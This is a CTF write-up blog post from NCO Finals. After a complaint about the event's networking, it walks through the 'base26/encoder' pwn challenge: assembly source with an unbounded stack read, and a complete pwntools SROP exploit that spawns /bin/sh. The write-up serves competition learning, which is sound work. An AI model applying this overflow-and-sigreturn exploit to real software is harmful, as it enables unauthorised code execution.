Preamble (Rant about Infra)#

Coming into NCO Finals, I expected a generally smooth-running event. Maybe a few infrastructure overloads here and there, maybe a few challenges with hiccups, the usual CTF infra pain points. What I did not expect, however, was for the infrastructure and networking setup to be down for the large majority of the time of the CTF (to the extent that the organisers had to request us to use our mobile hotspots in order to maintain internet connectivity). The CTFd was unusable half the time, as it depended on the Google Fonts API, which was inaccessible due to the frankly horrid (and should I say rather peculiarly configured) networking setup during the competition. Nonetheless, despite these technical difficulties, the actual challenges were rather interesting, and I would like to share some of my solutions for a few challenges that I found interesting. I am still in the process of upsolving some other challenges; these will be updated in this article once I get round to solving them.

Recommended listening: https://music.apple.com/sg/album/o-magnum-mysterium/487123957?i=487123980 (This rendition is really cool )

Pwn#

base26/encoder#

“Excellent!” I cried.

“Elementary,” said [Sherlock Holmes]. “It is one of those instances where the reasoner can produce an effect which seems remarkable to his neighbor, because the latter has missed the one little point which is the basis of the deduction. […]”

~ Sir Arthur Conan Doyle, The Adventure of the Crooked Man

I genuinely did not know what was going through my mind when I was tackling this challenge. I mistook it for a traditional ROP challenge, which cost me precious points and time during the competition time frame. Anyways, here is the challenge source:

1
; nasm -f elf64 chal.asm -o chal.o && ld chal.o -o chal -z noexecstack
2
section .data
3
    prompt db "Please enter a string to encode: ", 0
4
    len_prompt equ $ - prompt
5
    name_prompt db "What is your name? ", 0
6
    len_name_prompt equ $ - name_prompt
7
    newline db 10
8

9
section .bss
10
    out_buf resb 2      ; 2-byte buffer to hold encoded characters for printing
11
    username resb 64
12

13
section .text
14
    global _start
15

16
_start:
17
    ; --- What is your name? ---
18
    mov rax, 1
19
    mov rdi, 1
20
    mov rsi, name_prompt
21
    mov rdx, len_name_prompt
22
    syscall
23

24
    mov rax, 0
25
    mov rdi, 0
26
    mov rsi, username
27
    mov rdx, 64
28
    syscall
29

30
    call main
31
    ; Exit
32
    mov rdi, 0
33
    push 60
34
    pop rax
35
    syscall
36
    ret
37

38
main:
39
    push rbp
40
    mov rbp, rsp
41
    sub rsp, 1024         ; Allocate a 1024-byte buffer on the stack
42

43
    ; Print prompt
44
    mov rax, 1
45
    mov rdi, 1
46
    mov rsi, prompt
47
    mov rdx, len_prompt
48
    syscall
49

50
    mov r8, rsp         ; r8 will track our current write position in the buffer
51

52
read_loop:
53
    mov rax, 0          ; sys_read
54
    mov rdi, 0          ; stdin
55
    mov rsi, r8         ; write directly to the current stack pointer location
56
    mov rdx, 1          ; read 1 byte at a time
57
    syscall
58

59
    ; Check for EOF or Newline (0xA)
60
    cmp rax, 0
61
    jle encode_init     ; If EOF or error, stop reading
62
    cmp byte [r8], 10
63
    je encode_init      ; If newline, stop reading
64

65
    inc r8
66
    jmp read_loop
67

68
encode_init:
69
    mov r9, rsp         ; r9 will iterate through the buffer we just read
70

71
encode_loop:
72
    cmp r9, r8          ; Did we reach the end of the user's input?
73
    je finish
74

75
    ; --- Custom Base26 Encoding ---
76
    movzx ax, byte [r9] ; Load the current byte into AX
77
    mov cl, 26
78
    div cl              ; Divide AX by 26.
79
                        ; AL gets the quotient, AH gets the remainder.
80

81
    add al, 'a'         ; Convert quotient to 'a'-'z'
82
    add ah, 'a'         ; Convert remainder to 'a'-'z'
83

84
    ; Store the two Base26 characters in our output buffer
85
    mov [out_buf], al
86
    mov [out_buf+1], ah
87

88
    ; Print the 2 encoded characters
89
    mov rax, 1          ; sys_write
90
    mov rdi, 1          ; stdout
91
    mov rsi, out_buf
92
    mov rdx, 2          ; write 2 bytes
93
    syscall
94

95
    inc r9              ; Move to the next byte in the input buffer
96
    jmp encode_loop
97

98
finish:
99
    ; Print a newline at the very end
100
    mov rax, 1
101
    mov rdi, 1
102
    mov rsi, newline
103
    mov rdx, 1
104
    syscall
105

106
    ; Epilogue / Cleanup
107
    mov rsp, rbp
108
    pop rbp
109
    ret

What I should have noticed is that there is a pop rax; syscall; ret gadget which allows me to control rax, and thus trivially set up a Sigreturn frame on the stack to do SROP. However, my brain tunnel-visioned into thinking about how to gain control of rdi, rsi and rdx to execve("/bin/sh", 0, 0).

We also notice that name is stored in .bss, and since there is no PIE on this binary, we have a nice place to put /bin/sh\x00.

Thus, we can just do a simple SROP setup as such:

1
#!/usr/bin/env python3
2

3
from pwn import *
4

5
exe = ELF("./chal_patched")
6

7
context.binary = exe
8
context.terminal = ["zellij", "action", "new-pane", "--"]
9
context.gdb_binary = "/usr/bin/pwndbg"
10

11
gdbscript = """
12
set breakpoint pending on
13
b *0x401043
14
continue
15
"""
16

17

18
def conn():
19
    if args.LOCAL:
20
        r = process([exe.path])
21
        if args.GDB:
22
            gdb.attach(r, gdbscript=gdbscript)
23
            pause()
24
    else:
25
        r = remote("addr", 1337)
26

27
    return r
28

29

30
def main():
31
    r = conn()
32
    payload = b"A" * 0x408
33
    payload += p64(0x401042)
34
    payload += p64(0xf)
35
    frame = SigreturnFrame()
36
    frame.rax = 0x3b
37
    frame.rdi = 0x000000000040203A
38
    frame.rsi = 0
39
    frame.rdx = 0
40
    frame.rip = 0x0000000000401043
41
    payload += bytes(frame)
42
    r.sendlineafter(b"? ", b"/bin/sh\x00")
43
    r.sendlineafter(b": ", payload)
44

45
    r.interactive()
46

47

48
if __name__ == "__main__":
49
    main()